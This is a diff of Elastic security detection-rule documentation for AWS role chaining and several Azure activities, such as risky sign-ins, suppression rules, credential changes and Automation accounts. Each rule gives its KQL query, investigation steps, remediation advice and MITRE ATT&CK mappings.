+- **Correlate with other activity.** Look for related alerts or CloudTrail activity within ±30 minutes: policy changes, unusual S3 access, or use of sensitive APIs. Use `aws.cloudtrail.user_identity.arn` to track behavior from the same role session, use `aws.cloudtrail.user_identity.session_context.session_issuer.arn` to track broader behavior from the role itself. +- **Validate legitimacy.** Contact the account or service owner to confirm if the chaining was expected (for example, automation pipelines or federated access flows). +- **Geography & source.** Review `cloud.region`, `source.address`, and other `geo` fields to assess if the activity originates from expected regions or network ranges. + + +*False positive analysis* + + +- **Expected role chaining.** Some organizations use role chaining as part of multi-account access strategies. Maintain an allowlist of known `issuer.arn` - `target.arn` pairs. +- **Automation and scheduled tasks.** CI/CD systems or monitoring tools may assume roles frequently. Validate by `userAgent` and historical behavior. +- **Test/dev environments.** Development accounts may generate experimental chaining patterns. Tune rules or exceptions to exclude low-risk accounts. + + +*Response and remediation* + + +**1. Immediate steps** +- **Preserve evidence.** Export triggering CloudTrail events (±30 minutes) into a restricted evidence bucket. Include session context, source IP, and user agent. +- **Notify owners.** Contact the owners of both roles to validate intent. + +**2. Containment (if suspicious)** +- **Revoke temporary credentials.** https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_revoke-sessions.html[Revoke Session Permissions] if possible, or attach https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSDenyAll.html[AWSDenyALL policy] to the originating role. +- **Restrict risky roles.** Apply least-privilege policies or temporarily deny `sts:AssumeRole` for suspicious principals. +- **Enable monitoring.** Ensure CloudTrail and GuardDuty are active in all regions to detect further chaining. + +**3. Scope and hunt** +- Search for additional AssumeRole activity by the same `issuer.arn` or `resources.arn` across other accounts and regions. +- Look for privilege escalation attempts (for example, IAM `AttachRolePolicy`, `UpdateAssumeRolePolicy`) or sensitive data access following the chain. + +**4. Recovery & hardening** +- Apply least privilege to all roles, limiting trust policies to only required principals. +- Enforce MFA where possible on AssumeRole operations. +- Periodically review role chaining patterns to validate necessity; remove unused or risky trust relationships. +- Document and tune new terms exceptions for known, legitimate chains. + + +*Additional information* + + +- https://github.com/aws-samples/aws-incident-response-playbooks/[AWS IR Playbooks]: NIST-aligned templates for evidence, containment, eradication, recovery, post-incident. +- https://github.com/aws-samples/aws-customer-playbook-framework/[AWS Customer Playbook Framework]: Practical response steps for account and IAM misuse scenarios +- AWS IAM Best Practices: https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html[AWS docs] for reducing risk from temporary credentials. + +==== Setup + + +The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
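+
+As a starting point for the scope-and-hunt guidance above, a KQL pivot like the following lists other AssumeRole calls made from sessions issued by the same role; the issuer ARN is a placeholder to be replaced with the value from the alert:
+
+[source, js]
+----------------------------------
+event.dataset : "aws.cloudtrail" and event.provider : "sts.amazonaws.com" and
+  event.action : "AssumeRole" and aws.cloudtrail.user_identity.type : "AssumedRole" and
+  aws.cloudtrail.user_identity.session_context.session_issuer.arn : "arn:aws:iam::123456789012:role/<calling-role>"
+----------------------------------
+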
+ +==== Rule query + + +[source, js] +---------------------------------- + event.dataset : "aws.cloudtrail" and + event.provider : "sts.amazonaws.com" and + event.action : "AssumeRole" and + aws.cloudtrail.user_identity.type : "AssumedRole" and + event.outcome : "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Application Access Token +** ID: T1550.001 +** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc new file mode 100644 index 0000000000..b1b500a85d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-19-8-azure-active-directory-high-risk-user-sign-in-heuristic]] +=== Azure Active Directory High Risk User Sign-in Heuristic + +Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsoft Identity Protection machine learning and heuristics. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.signinlogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk#investigation-framework + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access + +*Version*: 108 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Active Directory High Risk User Sign-in Heuristic* + + +Microsoft Identity Protection is an Azure AD security tool that detects various types of identity risks and attacks. + +This rule identifies events produced by the Microsoft Identity Protection with a risk state equal to `confirmedCompromised` or `atRisk`. + + +*Possible investigation steps* + + +- Identify the Risk Detection that triggered the event. 
A list with descriptions can be found https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection[here]. +- Identify the user account involved and validate whether the suspicious activity is normal for that user. + - Consider the source IP address and geolocation for the involved user account. Do they look normal? + - Consider the device used to sign in. Is it registered and compliant? +- Investigate other alerts associated with the user account during the past 48 hours. +- Contact the account owner and confirm whether they are aware of this activity. +- Check if this operation was approved and performed according to the organization's change management policy. +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + + +If this rule is noisy in your environment due to expected activity, consider adding exceptions — preferably with a combination of user and device conditions. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. + - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Consider enabling multi-factor authentication for users. +- Follow security best practices https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices[outlined] by Microsoft. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
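+
+To review other recent risky sign-ins for the same account during triage, a KQL pivot of this shape can be used; `user.name` is assumed here as the user identifier and may need to be replaced with the equivalent field populated by your sign-in logs:
+
+[source, js]
+----------------------------------
+event.dataset : azure.signinlogs and
+  azure.signinlogs.properties.risk_state : ("confirmedCompromised" or "atRisk") and
+  user.name : "<user-principal-name>"
+----------------------------------
+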
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.signinlogs and + azure.signinlogs.properties.risk_state:("confirmedCompromised" or "atRisk") and event.outcome:(success or Success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-active-directory-powershell-sign-in.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-active-directory-powershell-sign-in.asciidoc new file mode 100644 index 0000000000..e5b03fae47 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-active-directory-powershell-sign-in.asciidoc @@ -0,0 +1,138 @@ +[[prebuilt-rule-8-19-8-azure-active-directory-powershell-sign-in]] +=== Azure Active Directory PowerShell Sign-in + +Identifies a sign-in using the Azure Active Directory PowerShell module. PowerShell for Azure Active Directory allows for managing settings from the command line, which is intended for users who are members of an admin role. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.signinlogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ +* https://docs.microsoft.com/en-us/microsoft-365/enterprise/connect-to-microsoft-365-powershell?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Active Directory PowerShell Sign-in* + + +Azure Active Directory PowerShell for Graph (Azure AD PowerShell) is a module IT professionals commonly use to manage their Azure Active Directory. The cmdlets in the Azure AD PowerShell module enable you to retrieve data from the directory, create new objects in the directory, update existing objects, remove objects, as well as configure the directory and its features. + +This rule identifies sign-ins that use the Azure Active Directory PowerShell module, which can indicate unauthorized access if done outside of IT or engineering. + + +*Possible investigation steps* + + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Evaluate whether the user needs to access Azure AD using PowerShell to complete its tasks. +- Investigate other alerts associated with the user account during the past 48 hours. +- Consider the source IP address and geolocation for the involved user account. Do they look normal? +- Contact the account owner and confirm whether they are aware of this activity. 
+- Investigate suspicious actions taken by the user using the module, for example, modifications in security settings that weaken the security policy, persistence-related tasks, and data access. +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + + +- If this activity is expected and noisy in your environment, consider adding IT, Engineering, and other authorized users as exceptions — preferably with a combination of user and device conditions. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. + - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Consider enabling multi-factor authentication for users. +- Follow security best practices https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices[outlined] by Microsoft. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.
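+
+To establish whether PowerShell sign-ins are routine for the account in question, a KQL pivot along these lines can be run over a longer time range; `user.name` is assumed here as the user identifier and may differ in your environment:
+
+[source, js]
+----------------------------------
+event.dataset : azure.signinlogs and
+  azure.signinlogs.properties.app_display_name : "Azure Active Directory PowerShell" and
+  user.name : "<user-principal-name>"
+----------------------------------
+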
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.signinlogs and + azure.signinlogs.properties.app_display_name:"Azure Active Directory PowerShell" and + azure.signinlogs.properties.token_issuer_type:AzureAD and event.outcome:(success or Success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-alert-suppression-rule-created-or-modified.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-alert-suppression-rule-created-or-modified.asciidoc new file mode 100644 index 0000000000..fa41e3623a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-alert-suppression-rule-created-or-modified.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-azure-alert-suppression-rule-created-or-modified]] +=== Azure Alert Suppression Rule Created or Modified + +Identifies the creation of suppression rules in Azure. Suppression rules are a mechanism used to suppress alerts previously identified as false positives or too noisy to be in production. This mechanism can be abused or mistakenly configured, resulting in defense evasions and loss of security visibility. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +* https://docs.microsoft.com/en-us/rest/api/securitycenter/alerts-suppression-rules/update + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Alert Suppression Rule Created or Modified* + + +Azure Alert Suppression Rules are used to manage alert noise by filtering out known false positives. However, adversaries can exploit these rules to hide malicious activities by suppressing legitimate security alerts. 
The detection rule monitors Azure activity logs for successful operations related to suppression rule changes, helping identify potential misuse that could lead to defense evasion and reduced security visibility. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the specific suppression rule that was created or modified by filtering logs with the operation name "MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE" and ensuring the event outcome is "success". +- Determine the identity of the user or service principal that performed the operation by examining the associated user or service account details in the activity logs. +- Investigate the context and justification for the creation or modification of the suppression rule by checking any related change management records or communications. +- Assess the impact of the suppression rule on security visibility by identifying which alerts are being suppressed and evaluating whether these alerts are critical for detecting potential threats. +- Cross-reference the suppression rule changes with recent security incidents or alerts to determine if there is any correlation or if the rule could have been used to hide malicious activity. +- Verify the legitimacy of the suppression rule by consulting with relevant stakeholders, such as security operations or cloud management teams, to confirm if the change was authorized and aligns with security policies. + + +*False positive analysis* + + +- Routine maintenance activities by IT staff may trigger alerts when legitimate suppression rules are created or modified. To manage this, establish a baseline of expected changes and create exceptions for known maintenance periods or personnel. +- Automated processes or scripts that regularly update suppression rules for operational efficiency can generate false positives. Identify these processes and exclude their activity from alerting by using specific identifiers or tags associated with the automation. +- Changes made by trusted third-party security services that integrate with Azure might be flagged. Verify the legitimacy of these services and whitelist their operations to prevent unnecessary alerts. +- Frequent updates to suppression rules due to evolving security policies can lead to false positives. Document these policy changes and adjust the alerting criteria to accommodate expected modifications. +- Temporary suppression rules created during incident response to manage alert noise can be mistaken for malicious activity. Ensure these rules are documented and time-bound, and exclude them from alerting during the response period. + + +*Response and remediation* + + +- Immediately review the Azure activity logs to confirm the creation or modification of the suppression rule and identify the user or service account responsible for the change. +- Temporarily disable the suspicious suppression rule to restore visibility into potential security alerts that may have been suppressed. +- Conduct a thorough investigation of recent alerts that were suppressed by the rule to determine if any malicious activities were overlooked. +- If malicious activity is confirmed, initiate incident response procedures to contain and remediate the threat, including isolating affected resources and accounts. +- Escalate the incident to the security operations team for further analysis and to assess the potential impact on the organization's security posture. 
+- Implement additional monitoring and alerting for changes to suppression rules to ensure any future modifications are promptly detected and reviewed. +- Review and update access controls and permissions for creating or modifying suppression rules to ensure only authorized personnel can make such changes. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.SECURITY/ALERTSSUPPRESSIONRULES/WRITE" and +event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-application-credential-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-application-credential-modification.asciidoc new file mode 100644 index 0000000000..0e880e53ce --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-application-credential-modification.asciidoc @@ -0,0 +1,120 @@ +[[prebuilt-rule-8-19-8-azure-application-credential-modification]] +=== Azure Application Credential Modification + +Identifies when a new credential is added to an application in Azure. An application may use a certificate or secret string to prove its identity when requesting a token. Multiple certificates and secrets can be added for an application and an adversary may abuse this by creating an additional authentication method to evade defenses or persist in an environment. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.auditlogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Application Credential Modification* + + +Azure applications use credentials like certificates or secret strings for identity verification during token requests. Adversaries may exploit this by adding unauthorized credentials, enabling persistent access or evading defenses. The detection rule monitors audit logs for successful updates to application credentials, flagging potential misuse by identifying unauthorized credential modifications. 
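+
+As a quick triage step, the same audit data can be reviewed in Discover without the outcome filter so that failed credential-update attempts are visible alongside the successful one that triggered the alert. This is a minimal KQL sketch that reuses only the fields from the rule query below; adjust the time range and add filters for the application of interest as needed.
+
+[source, js]
+----------------------------------
+event.dataset:azure.auditlogs and
+  azure.auditlogs.operation_name:"Update application - Certificates and secrets management"
+
+----------------------------------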
+ + +*Possible investigation steps* + + +- Review the Azure audit logs to identify the specific application that had its credentials updated, focusing on entries with the operation name "Update application - Certificates and secrets management" and a successful outcome. +- Determine the identity of the user or service principal that performed the credential modification by examining the associated user or principal ID in the audit log entry. +- Investigate the context of the credential modification by checking for any recent changes or unusual activities related to the application, such as modifications to permissions or roles. +- Assess the legitimacy of the new credential by verifying if it aligns with expected operational procedures or if it was authorized by a known and trusted entity. +- Check for any additional suspicious activities in the audit logs around the same timeframe, such as failed login attempts or other modifications to the application, to identify potential indicators of compromise. +- Contact the application owner or relevant stakeholders to confirm whether the credential addition was expected and authorized, and gather any additional context or concerns they might have. + + +*False positive analysis* + + +- Routine credential updates by authorized personnel can trigger alerts. Regularly review and document credential management activities to distinguish between legitimate and suspicious actions. +- Automated processes or scripts that update application credentials as part of maintenance or deployment cycles may cause false positives. Identify and whitelist these processes to prevent unnecessary alerts. +- Credential updates during application scaling or migration might be flagged. Coordinate with IT teams to schedule these activities and temporarily adjust monitoring thresholds or exclusions. +- Third-party integrations that require periodic credential updates can be mistaken for unauthorized changes. Maintain an inventory of such integrations and establish baseline behaviors to filter out benign activities. +- Frequent updates by specific service accounts could be part of normal operations. Monitor these accounts separately and consider creating exceptions for known, non-threatening patterns. + + +*Response and remediation* + + +- Immediately revoke the unauthorized credentials by accessing the Azure portal and removing any suspicious certificates or secret strings associated with the affected application. +- Conduct a thorough review of the application's access logs to identify any unauthorized access or actions performed using the compromised credentials. +- Reset and update all legitimate credentials for the affected application to ensure no further unauthorized access can occur. +- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized credential modification and any potential impact. +- Implement additional monitoring on the affected application to detect any further unauthorized changes or access attempts. +- Review and tighten access controls and permissions for managing application credentials to prevent unauthorized modifications in the future. +- If necessary, escalate the incident to higher-level security management or external cybersecurity experts for further investigation and response. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update application - Certificates and secrets management" and event.outcome:(success or Success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Credentials +** ID: T1098.001 +** Reference URL: https://attack.mitre.org/techniques/T1098/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-account-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-account-created.asciidoc new file mode 100644 index 0000000000..b9fe03c561 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-account-created.asciidoc @@ -0,0 +1,125 @@ +[[prebuilt-rule-8-19-8-azure-automation-account-created]] +=== Azure Automation Account Created + +Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor +* https://github.com/hausec/PowerZure +* https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a +* https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Automation Account Created* + + +Azure Automation accounts facilitate the automation of management tasks and orchestration across cloud environments, enhancing operational efficiency. However, adversaries may exploit these accounts to establish persistence by automating malicious activities. The detection rule monitors the creation of these accounts by analyzing specific Azure activity logs, focusing on successful operations, to identify potential unauthorized or suspicious account creations. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the creation of the Automation account by checking for the operation name "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WRITE" and ensure the event outcome is marked as Success. 
+- Identify the user or service principal that initiated the creation of the Automation account by examining the associated user identity information in the activity logs. +- Investigate the context of the Automation account creation by reviewing recent activities performed by the identified user or service principal to determine if there are any other suspicious or unauthorized actions. +- Check the configuration and permissions of the newly created Automation account to ensure it does not have excessive privileges that could be exploited for persistence or lateral movement. +- Correlate the Automation account creation event with other security alerts or logs to identify any patterns or indicators of compromise that may suggest malicious intent. + + +*False positive analysis* + + +- Routine administrative tasks may trigger the rule when legitimate users create Azure Automation accounts for operational purposes. To manage this, maintain a list of authorized personnel and their expected activities, and cross-reference alerts with this list. +- Automated deployment scripts or infrastructure-as-code tools might create automation accounts as part of their normal operation. Identify these scripts and exclude their associated activities from triggering alerts by using specific identifiers or tags. +- Scheduled maintenance or updates by cloud service providers could result in the creation of automation accounts. Verify the timing and context of the account creation against known maintenance schedules and exclude these from alerts if they match. +- Development and testing environments often involve frequent creation and deletion of resources, including automation accounts. Implement separate monitoring rules or environments for these non-production areas to reduce noise in alerts. + + +*Response and remediation* + + +- Immediately review the Azure activity logs to confirm the creation of the Automation account and identify the user or service principal responsible for the action. +- Disable the newly created Azure Automation account to prevent any potential malicious automation tasks from executing. +- Conduct a thorough investigation of the user or service principal that created the account to determine if their credentials have been compromised or if they have acted maliciously. +- Reset credentials and enforce multi-factor authentication for the identified user or service principal to prevent unauthorized access. +- Review and adjust Azure role-based access control (RBAC) policies to ensure that only authorized personnel have the ability to create Automation accounts. +- Escalate the incident to the security operations team for further analysis and to determine if additional systems or accounts have been compromised. +- Implement enhanced monitoring and alerting for future Automation account creations to quickly detect and respond to similar threats. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. 
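+
+When triaging an alert from this rule, it can also help to list recent Automation account write operations together with the identity that initiated them. The KQL sketch below assumes the `azure.activitylogs.identity.claims_initiated_by_user.name` field from the Azure integration's activity log mapping; substitute whichever initiator field your data actually populates.
+
+[source, js]
+----------------------------------
+event.dataset:azure.activitylogs and
+  azure.activitylogs.operation_name:"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WRITE" and
+  azure.activitylogs.identity.claims_initiated_by_user.name:*
+
+----------------------------------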
+ +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WRITE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-runbook-created-or-modified.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-runbook-created-or-modified.asciidoc new file mode 100644 index 0000000000..99c4ff165e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-runbook-created-or-modified.asciidoc @@ -0,0 +1,126 @@ +[[prebuilt-rule-8-19-8-azure-automation-runbook-created-or-modified]] +=== Azure Automation Runbook Created or Modified + +Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor +* https://github.com/hausec/PowerZure +* https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a +* https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Configuration Audit +* Tactic: Execution +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + 